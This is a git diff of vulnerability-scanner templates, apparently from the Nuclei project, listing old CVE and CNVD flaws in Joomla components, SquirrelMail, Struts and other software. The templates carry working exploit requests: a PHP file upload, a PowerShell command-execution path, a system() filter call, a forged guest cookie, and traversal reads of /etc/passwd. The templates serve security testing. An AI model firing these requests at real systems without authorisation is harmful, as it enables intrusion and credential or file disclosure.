cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:L/A:L
cvss-score: 9.9
cwe-id: CWE-434
remediation: Pan Wei has released an update to resolve this vulnerability.
tags: pan,micro,cnvd,cnvd2021
requests:
- raw:
- |
POST /general/index/UploadFile.php?m=uploadPicture&uploadType=eoffice_logo&userId= HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=e64bdf16c554bbc109cecef6451c26a4
--e64bdf16c554bbc109cecef6451c26a4
Content-Disposition: form-data; name="Filedata"; filename="{{randstr}}.php"
Content-Type: image/jpeg
<?php echo md5('CNVD-2021-49104');?>
--e64bdf16c554bbc109cecef6451c26a4--
- |
GET /images/logo/logo-eoffice.php HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "94d01a2324ce38a2e29a629c54190f67"
- type: status
status:
- 200
# Enhanced by cs on 2022/02/28

View File

@ -0,0 +1,49 @@
id: CNVD-2022-03672
info:
name: Sunflower Simple and Personal - Remote Code Execution
author: daffainfo
severity: critical
description: Sunflower Simple and Personal is susceptible to a remote code execution vulnerability.
reference:
- https://www.1024sou.com/article/741374.html
- https://copyfuture.com/blogs-details/202202192249158884
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-10270
- https://www.cnvd.org.cn/flaw/show/CNVD-2022-03672
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cwe-id: CWE-77
tags: cnvd,cnvd2020,sunflower,rce
requests:
- raw:
- |
POST /cgi-bin/rpc HTTP/1.1
Host: {{Hostname}}
action=verify-haras
- |
GET /check?cmd=ping../../../windows/system32/windowspowershell/v1.0/powershell.exe+ipconfig HTTP/1.1
Host: {{Hostname}}
Cookie: CID={{cid}}
extractors:
- type: regex
name: cid
internal: true
group: 1
regex:
- '"verify_string":"(.*)"'
req-condition: true
matchers:
- type: dsl
dsl:
- "status_code_1==200"
- "status_code_2==200"
- "contains(body_1, 'verify_string')"
- "contains(body_2, 'Windows IP')"
condition: and
# Enhanced by mp on 2022/05/12

View File

@ -1,27 +0,0 @@
id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cvnd,catfishcms
requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'

View File

@ -1,29 +0,0 @@
id: CNVD-2021-17369
info:
name: Ruijie Smartweb Management System Password Information Disclosure
author: pikpikcu
severity: medium
reference: https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
tags: ruijie,disclosure,cnvd
requests:
- method: GET
path:
- "{{BaseURL}}/web/xml/webuser-auth.xml"
headers:
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
matchers-condition: and
matchers:
- type: word
words:
- "<userauth>"
- "<password>"
part: body
condition: and
- type: status
status:
- 200

1352
contributors.json Normal file

File diff suppressed because it is too large Load Diff

View File

@ -8,6 +8,9 @@ info:
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2000-0114
- https://www.exploit-db.com/exploits/19897
classification:
cve-id: CVE-2000-0114
remediation: Upgrade to the latest version.
tags: cve,cve2000,frontpage,microsoft
requests:
@ -25,3 +28,5 @@ requests:
part: body
words:
- "_vti_bin/shtml.dll"
# Enhanced by mp on 2022/01/27

View File

@ -4,22 +4,26 @@ info:
name: Deprecated SSHv1 Protocol Detection
author: iamthefrogy
severity: high
tags: network,ssh,openssh,cves,cves2001
description: SSHv1 is deprecated and has known cryptographic issues.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
classification:
cvss-score: 7.4
cvss-metrics: CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
cvss-score: 7.4
cve-id: CVE-2001-1473
cwe-id: CWE-310
remediation: Upgrade to SSH 2.4 or later.
tags: cve,cve2001,network,ssh,openssh
network:
- host:
- "{{Hostname}}"
- "{{Hostname}}:22"
- "{{Host}}:22"
matchers:
- type: word
words:
- "SSH-1"
# Enhanced by Chris on 2022/01/21

View File

@ -5,7 +5,13 @@ info:
author: dhiyaneshDk
severity: medium
description: The Virtual Keyboard plugin for SquirrelMail is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
reference: https://www.exploit-db.com/exploits/21811
reference:
- https://www.exploit-db.com/exploits/21811
- http://archives.neohapsis.com/archives/bugtraq/2002-09/0246.html
- http://www.securityfocus.com/bid/5763
- http://www.iss.net/security_center/static/10145.php
classification:
cve-id: CVE-2002-1131
tags: xss,squirrelmail,cve,cve2002
requests:

View File

@ -4,8 +4,15 @@ info:
name: SquirrelMail 1.4.x - Folder Name Cross-Site Scripting
author: dhiyaneshDk
severity: medium
description: "Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script as other users and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php."
reference: https://www.exploit-db.com/exploits/24068
description: Multiple cross-site scripting (XSS) vulnerabilities in SquirrelMail 1.4.2 allow remote attackers to execute arbitrary script and possibly steal authentication information via multiple attack vectors, including the mailbox parameter in compose.php.
reference:
- https://www.exploit-db.com/exploits/24068
- ftp://patches.sgi.com/support/free/security/advisories/20040604-01-U.asc
- http://security.gentoo.org/glsa/glsa-200405-16.xml
- http://www.securityfocus.com/archive/1/361857
remediation: Upgrade to the latest version.
classification:
cve-id: CVE-2004-0519
tags: xss,squirrelmail,cve2004,cve
requests:
@ -28,3 +35,5 @@ requests:
part: header
words:
- "text/html"
# Enhanced by mp on 2022/01/27

View File

@ -1,13 +1,21 @@
id: CVE-2005-2428
info:
name: CVE-2005-2428
name: Lotus Domino R5 and R6 WebMail - Information Disclosure
author: CasperGN
severity: medium
tags: cve,cve2005
description: Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled, stores sensitive data from names.nsf in hidden form fields, which allows remote attackers to read the HTML source to obtain sensitive information such as (1) the password hash in the HTTPPassword field, (2) the password change date in the HTTPPasswordChangeDate field, (3) the client platform in the ClntPltfrm field, (4) the client machine name in the ClntMachine field, and (5) the client Lotus Domino release in the ClntBld field, a different vulnerability than CVE-2005-2696.
description: Lotus Domino R5 and R6 WebMail with 'Generate HTML for all fields' enabled (which is by default) allows remote attackers to read the HTML source to obtain sensitive information including the password hash in the HTTPPassword field, the password change date in the HTTPPasswordChangeDate field, and the client Lotus Domino release in the ClntBld field (a different vulnerability than CVE-2005-2696).
reference:
- http://www.cybsec.com/vuln/default_configuration_information_disclosure_lotus_domino.pdf
- https://www.exploit-db.com/exploits/39495
- https://nvd.nist.gov/vuln/detail/CVE-2005-2428
remediation: Ensure proper firewalls are in place within your environment to prevent public exposure of the names.nsf database and other sensitive files.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2005-2428
cwe-id: CWE-200
tags: cve,cve2005,domino
requests:
- method: GET
@ -21,5 +29,7 @@ requests:
- type: regex
name: domino-username
regex:
- '(<a href\=\"/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
- '(<a href="/names\.nsf/[0-9a-z\/]+\?OpenDocument)'
part: body
# Enhanced by mp on 2022/05/04

View File

@ -0,0 +1,37 @@
id: CVE-2005-3344
info:
name: Horde Groupware Unauthenticated Admin Access
author: pikpikcu
severity: critical
description: Horde Groupware contains an administrative account with a blank password, which allows remote attackers to gain access.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2005-3344
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3344
- http://www.debian.org/security/2005/dsa-884
- http://www.securityfocus.com/bid/15337/
classification:
cve-id: CVE-2005-3344
tags: horde,unauth
requests:
- method: GET
path:
- "{{BaseURL}}/horde/admin/user.php"
- "{{BaseURL}}/admin/user.php"
headers:
Content-Type: text/html
matchers-condition: and
matchers:
- type: word
words:
- "<title>Horde :: User Administration</title>"
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/03/18

View File

@ -2,12 +2,16 @@ id: CVE-2005-4385
info:
name: Cofax <= 2.0RC3 XSS
author: geeknik
severity: medium
description: Cross-site scripting vulnerability in search.htm in Cofax 2.0 RC3 and earlier allows remote attackers to inject arbitrary web script or HTML via the searchstring parameter.
reference:
- http://pridels0.blogspot.com/2005/12/cofax-xss-vuln.html
- https://nvd.nist.gov/vuln/detail/CVE-2005-4385
author: geeknik
severity: medium
- http://www.securityfocus.com/bid/15940
- http://www.osvdb.org/21850
classification:
cve-id: CVE-2005-4385
tags: cofax,xss,cve,cve2005
requests:

View File

@ -2,12 +2,16 @@ id: CVE-2006-1681
info:
name: Cherokee HTTPD <=0.5 XSS
author: geeknik
severity: medium
description: Cross-site scripting (XSS) vulnerability in Cherokee HTTPD 0.5 and earlier allows remote attackers to inject arbitrary web script or HTML via a malformed request that generates an HTTP 400 error, which is not properly handled when the error message is generated.
reference:
- https://www.securityfocus.com/bid/17408
- https://nvd.nist.gov/vuln/detail/CVE-2006-1681
author: geeknik
severity: medium
- http://secunia.com/advisories/19587
- http://www.securityfocus.com/bid/17408
classification:
cve-id: CVE-2006-1681
tags: cherokee,httpd,xss,cve,cve2006
requests:

View File

@ -4,8 +4,14 @@ info:
name: Squirrelmail 1.4.x - 'Redirect.php' Local File Inclusion
author: dhiyaneshDk
severity: high
description: "PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable."
reference: https://www.exploit-db.com/exploits/27948
description: 'PHP remote file inclusion vulnerability in functions/plugin.php in SquirrelMail 1.4.6 and earlier, if register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to execute arbitrary PHP code via a URL in the plugins array parameter. NOTE: this issue has been disputed by third parties, who state that Squirrelmail provides prominent warnings to the administrator when register_globals is enabled. Since the varieties of administrator negligence are uncountable, perhaps this type of issue should not be included in CVE. However, the original developer has posted a security advisory, so there might be relevant real-world environments under which this vulnerability is applicable.'
reference:
- https://www.exploit-db.com/exploits/27948
- http://squirrelmail.cvs.sourceforge.net/squirrelmail/squirrelmail/functions/global.php?r1=1.27.2.16&r2=1.27.2.17&view=patch&pathrev=SM-1_4-STABLE
- http://www.squirrelmail.org/security/issue/2006-06-01
- http://secunia.com/advisories/20406
classification:
cve-id: CVE-2006-2842
tags: cve2006,lfi,squirrelmail,cve
requests:

View File

@ -2,10 +2,16 @@ id: CVE-2007-0885
info:
name: Rainbow.Zen Jira XSS
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference: https://www.securityfocus.com/archive/1/459590/100/0/threaded
author: geeknik
severity: medium
description: Cross-site scripting (XSS) vulnerability in jira/secure/BrowseProject.jspa in Rainbow with the Zen (Rainbow.Zen) extension allows remote attackers to inject arbitrary web script or HTML via the id parameter.
reference:
- https://www.securityfocus.com/archive/1/459590/100/0/threaded
- http://www.securityfocus.com/bid/22503
- http://osvdb.org/33683
- https://exchange.xforce.ibmcloud.com/vulnerabilities/32418
classification:
cve-id: CVE-2007-0885
tags: cve,cve2007,jira,xss
requests:

View File

@ -1,13 +1,16 @@
id: CVE-2007-4504
info:
name: Joomla! Component RSfiles 1.0.2 - 'path' File Download
name: Joomla! Component RSfiles <=1.0.2 - Arbitrary File Retrieval
author: daffainfo
severity: high
description: Directory traversal vulnerability in index.php in the RSfiles component (com_rsfiles) 1.0.2 and earlier for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter in a files.display action.
description: An arbitrary file retrieval vulnerability in index.php in the RSfiles component (com_rsfiles) <=1.0.2 for Joomla! allows remote attackers to arbitrarily read files via a .. (dot dot) in the path parameter in a files.display action.
reference:
- https://www.exploit-db.com/exploits/4307
- https://www.cvedetails.com/cve/CVE-2007-4504
- https://exchange.xforce.ibmcloud.com/vulnerabilities/36222
classification:
cve-id: CVE-2007-4504
tags: cve,cve2007,joomla,lfi
requests:
@ -20,7 +23,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -1,11 +1,18 @@
id: CVE-2007-4556
info:
name: Apache Struts2 S2-001 RCE
name: OpenSymphony XWork/Apache Struts2 - Remote Code Execution
author: pikpikcu
severity: critical
description: Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via form input beginning with a "%{" sequence and ending with a "}" character.
reference: https://www.guildhab.top/?p=2326
description: |
Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
reference:
- https://www.guildhab.top/?p=2326
- https://nvd.nist.gov/vuln/detail/CVE-2007-4556
- https://cwiki.apache.org/confluence/display/WW/S2-001
- http://forums.opensymphony.com/ann.jspa?annID=54
classification:
cve-id: CVE-2007-4556
tags: cve,cve2007,apache,rce,struts
requests:
@ -22,9 +29,11 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/05/10

View File

@ -5,10 +5,16 @@ info:
author: dhiyaneshDK
severity: medium
description: Cross-site scripting (XSS) vulnerability in phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, different vectors than CVE-2007-2865.
tags: cve,cve2007,xss,pgadmin
reference: https://www.exploit-db.com/exploits/30090
reference:
- https://www.exploit-db.com/exploits/30090
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
- http://www.securityfocus.com/bid/24182
- http://secunia.com/advisories/25446
classification:
cve-id: CVE-2007-5728
metadata:
shodan-query: 'http.title:"phpPgAdmin"'
shodan-query: http.title:"phpPgAdmin"
tags: cve,cve2007,xss,pgadmin,phppgadmin
requests:
- method: GET

View File

@ -5,7 +5,13 @@ info:
author: unstabl3
severity: medium
description: Cross-site scripting (XSS) vulnerability in index.php in AppServ Open Project 2.5.10 and earlier allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
reference: https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
reference:
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
- http://www.securityfocus.com/bid/29291
- http://secunia.com/advisories/30333
- http://securityreason.com/securityalert/3896
classification:
cve-id: CVE-2008-2398
tags: cve,cve2008,xss
requests:

View File

@ -1,12 +1,20 @@
id: CVE-2008-2650
info:
name: CMSimple 3.1 - Local File Inclusion
author: pussycat0x
severity: high
description: |
Directory traversal vulnerability in cmsimple/cms.php in CMSimple 3.1, when register_globals is enabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
reference: https://www.exploit-db.com/exploits/5700
reference:
- http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
- http://www.securityfocus.com/bid/29450
- http://secunia.com/advisories/30463
- http://osvdb.org/45881
classification:
cve-id: CVE-2008-2650
tags: cve,cve2008,lfi
requests:
- raw:
- |

View File

@ -8,6 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/6618
- https://www.cvedetails.com/cve/CVE-2008-4668
- http://www.securityfocus.com/bid/31458
- http://securityreason.com/securityalert/4464
classification:
cve-id: CVE-2008-4668
tags: cve,cve2008,joomla,lfi
requests:
@ -20,7 +24,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -8,6 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/5435
- https://www.cvedetails.com/cve/CVE-2008-4764
- http://www.securityfocus.com/bid/28764
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
classification:
cve-id: CVE-2008-4764
tags: cve,cve2008,joomla,lfi
requests:
@ -20,7 +24,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -4,11 +4,17 @@ info:
name: phpPgAdmin 4.2.1 - '_language' Local File Inclusion
author: dhiyaneshDK
severity: medium
reference: https://www.exploit-db.com/exploits/7363
tags: cve2008,lfi,phppgadmin
description: Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/7363
- http://www.securityfocus.com/bid/32670
- http://secunia.com/advisories/33014
- http://secunia.com/advisories/33263
classification:
cve-id: CVE-2008-5587
metadata:
shodan-query: 'http.title:"phpPgAdmin"'
description: "Directory traversal vulnerability in libraries/lib.inc.php in phpPgAdmin 4.2.1 and earlier, when register_globals is enabled, allows remote attackers to read arbitrary files via a .. (dot dot) in the _language parameter to index.php."
shodan-query: http.title:"phpPgAdmin"
tags: cve2008,lfi,phppgadmin
requests:
- method: GET

View File

@ -8,6 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/6809
- https://www.cvedetails.com/cve/CVE-2008-6080
- http://secunia.com/advisories/32377
- http://www.securityfocus.com/bid/31877
classification:
cve-id: CVE-2008-6080
tags: cve,cve2008,joomla,lfi
requests:
@ -20,7 +24,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -4,10 +4,14 @@ info:
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla!, when magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
reference:
- https://www.exploit-db.com/exploits/6817
- https://www.cvedetails.com/cve/CVE-2008-6172
- http://secunia.com/advisories/32367
- http://www.securityfocus.com/bid/31892
classification:
cve-id: CVE-2008-6172
tags: cve,cve2008,joomla,lfi
requests:
@ -20,8 +24,10 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:
- 200
# Enhanced by mp on 2022/03/30

View File

@ -8,6 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/6980
- https://www.cvedetails.com/cve/CVE-2008-6222
- http://secunia.com/advisories/32523
- http://www.securityfocus.com/bid/32113
classification:
cve-id: CVE-2008-6222
tags: cve,cve2008,joomla,lfi
requests:
@ -20,7 +24,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -2,13 +2,17 @@ id: CVE-2008-6668
info:
name: nweb2fax <= 0.2.7 Directory Traversal
author: geeknik
severity: high
description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php.
reference:
- https://www.exploit-db.com/exploits/5856
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
author: geeknik
severity: high
tags: nweb2fax,lfi,cve,cve2008
- http://www.securityfocus.com/bid/29804
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
classification:
cve-id: CVE-2008-6668
tags: nweb2fax,lfi,cve,cve2008,traversal
requests:
- method: GET

View File

@ -3,9 +3,15 @@ id: CVE-2009-0545
info:
name: ZeroShell <= 1.0beta11 Remote Code Execution
author: geeknik
description: cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
reference: https://www.exploit-db.com/exploits/8023
severity: critical
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
reference:
- https://www.exploit-db.com/exploits/8023
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
- http://www.zeroshell.net/eng/announcements/
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
classification:
cve-id: CVE-2009-0545
tags: cve,cve2009,zeroshell,kerbynet,rce
requests:
@ -18,3 +24,5 @@ requests:
part: body
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/04/18

View File

@ -4,12 +4,15 @@ info:
name: Horde - Horde_Image::factory driver Argument LFI
author: pikpikcu
severity: high
description: |
Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
description: Directory traversal vulnerability in framework/Image/Image.php in Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
reference:
- https://www.exploit-db.com/exploits/16154
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
tags: cve,cve2009,horde,lfi
- http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
- http://secunia.com/advisories/33695
classification:
cve-id: CVE-2009-0932
tags: cve,cve2009,horde,lfi,traversal
requests:
- method: GET
@ -21,7 +24,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -8,6 +8,10 @@ info:
reference:
- https://www.phpmyadmin.net/security/PMASA-2009-3/
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
classification:
cve-id: CVE-2009-1151
tags: cve,cve2009,phpmyadmin,rce,deserialization
requests:

View File

@ -8,6 +8,9 @@ info:
reference:
- https://www.exploit-db.com/exploits/8367
- https://www.cvedetails.com/cve/CVE-2009-1496
- http://www.securityfocus.com/bid/34431
classification:
cve-id: CVE-2009-1496
tags: cve,cve2009,joomla,lfi
requests:
@ -20,7 +23,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -5,8 +5,14 @@ info:
author: daffainfo
severity: high
description: Directory traversal vulnerability in adm/file.cgi on the Cisco Linksys WVC54GCA wireless video camera with firmware 1.00R22 and 1.00R24 allows remote attackers to read arbitrary files via a %2e. (encoded dot dot) or an absolute pathname in the next_file parameter.
reference: https://www.exploit-db.com/exploits/32954
tags: cve,cve2009,iot,lfi
reference:
- https://www.exploit-db.com/exploits/32954
- http://www.securityfocus.com/bid/34713
- http://www.vupen.com/english/advisories/2009/1173
- http://www.gnucitizen.org/blog/hacking-linksys-ip-cameras-pt-3/
classification:
cve-id: CVE-2009-1558
tags: cve,cve2009,iot,lfi,linksys,camera,cisco,firmware,traversal
requests:
- method: GET
@ -17,7 +23,7 @@ requests:
matchers:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -8,6 +8,13 @@ info:
reference:
- https://www.securityfocus.com/archive/1/505803/100/0/threaded
- https://www.tenable.com/cve/CVE-2009-1872
- http://www.adobe.com/support/security/bulletins/apsb09-12.html
- http://www.dsecrg.com/pages/vul/show.php?id=122
classification:
cve-id: CVE-2009-1872
metadata:
shodan-query: http.component:"Adobe ColdFusion"
verified: "true"
tags: cve,cve2009,adobe,xss,coldfusion
requests:

View File

@ -8,6 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/8898
- https://www.cvedetails.com/cve/CVE-2009-2015
- http://www.securityfocus.com/bid/35259
- http://www.vupen.com/english/advisories/2009/1530
classification:
cve-id: CVE-2009-2015
tags: cve,cve2009,joomla,lfi
requests:
@ -20,7 +24,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -8,6 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/8946
- https://www.cvedetails.com/cve/CVE-2009-2100
- http://www.securityfocus.com/bid/35378
- http://osvdb.org/55176
classification:
cve-id: CVE-2009-2100
tags: cve,cve2009,joomla,lfi
requests:
@ -20,7 +24,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -8,6 +8,10 @@ info:
reference:
- https://www.exploit-db.com/exploits/9564
- https://www.cvedetails.com/cve/CVE-2009-3053
- http://www.securityfocus.com/bid/36207
- https://exchange.xforce.ibmcloud.com/vulnerabilities/52964
classification:
cve-id: CVE-2009-3053
tags: cve,cve2009,joomla,lfi
requests:
@ -20,7 +24,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -8,6 +8,9 @@ info:
reference:
- https://www.exploit-db.com/exploits/9706
- https://www.cvedetails.com/cve/CVE-2009-3318
- http://www.securityfocus.com/bid/36441
classification:
cve-id: CVE-2009-3318
tags: cve,cve2009,joomla,lfi
requests:
@ -20,7 +23,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -8,7 +8,11 @@ info:
reference:
- https://www.exploit-db.com/exploits/8870
- https://www.cvedetails.com/cve/CVE-2009-4202
tags: cve,cve2009,joomla,lfi
- http://www.vupen.com/english/advisories/2009/1494
- http://www.securityfocus.com/bid/35201
classification:
cve-id: CVE-2009-4202
tags: cve,cve2009,joomla,lfi,photo
requests:
- method: GET
@ -20,7 +24,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -2,12 +2,16 @@ id: CVE-2009-4223
info:
name: KR-Web <= 1.1b2 RFI
author: geeknik
severity: high
description: KR is a web content-server based on Apache-PHP-MySql technology which gives to programmers some PHP classes simplifying database content access. Additionally, it gives some admin and user tools to write, hierarchize, and authorize contents.
reference:
- https://sourceforge.net/projects/krw/
- https://www.exploit-db.com/exploits/10216
author: geeknik
severity: high
- https://exchange.xforce.ibmcloud.com/vulnerabilities/54395
- http://www.exploit-db.com/exploits/10216
classification:
cve-id: CVE-2009-4223
tags: cve,cve2009,krweb,rfi
requests:

View File

@ -5,10 +5,14 @@ info:
author: daffainfo
severity: high
description: Directory traversal vulnerability in the inertialFATE iF Portfolio Nexus (com_if_nexus) component 1.5 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
reference: |
reference:
- https://www.exploit-db.com/exploits/33440
- https://www.cvedetails.com/cve/CVE-2009-4679
tags: cve,cve2009,joomla,lfi
- http://secunia.com/advisories/37760
- http://www.osvdb.org/61382
classification:
cve-id: CVE-2009-4679
tags: cve,cve2009,joomla,lfi,nexus
requests:
- method: GET
@ -20,7 +24,7 @@ requests:
- type: regex
regex:
- "root:.*:0:0"
- "root:.*:0:0:"
- type: status
status:

View File

@ -0,0 +1,31 @@
id: CVE-2009-5020
info:
name: AWStats < 6.95 - Open Redirect
author: pdteam
severity: medium
description: An open redirect vulnerability in awredir.pl in AWStats < 6.95 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via unspecified vectors.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2009-5020
- http://awstats.sourceforge.net/docs/awstats_changelog.txt
remediation: Apply all relevant security patches and product upgrades.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2009-5020
cwe-id: CWE-601
tags: cve,cve2020,redirect,awstats
requests:
- method: GET
path:
- '{{BaseURL}}/awstats/awredir.pl?url=example.com'
- '{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=example.com'
stop-at-first-match: true
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/02/13

View File

@ -4,24 +4,27 @@ info:
name: WebGlimpse 2.18.7 - Directory Traversal
author: daffainfo
severity: high
description: Directory traversal vulnerability in wgarcmin.cgi in WebGlimpse 2.18.7 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) in the DOC parameter.
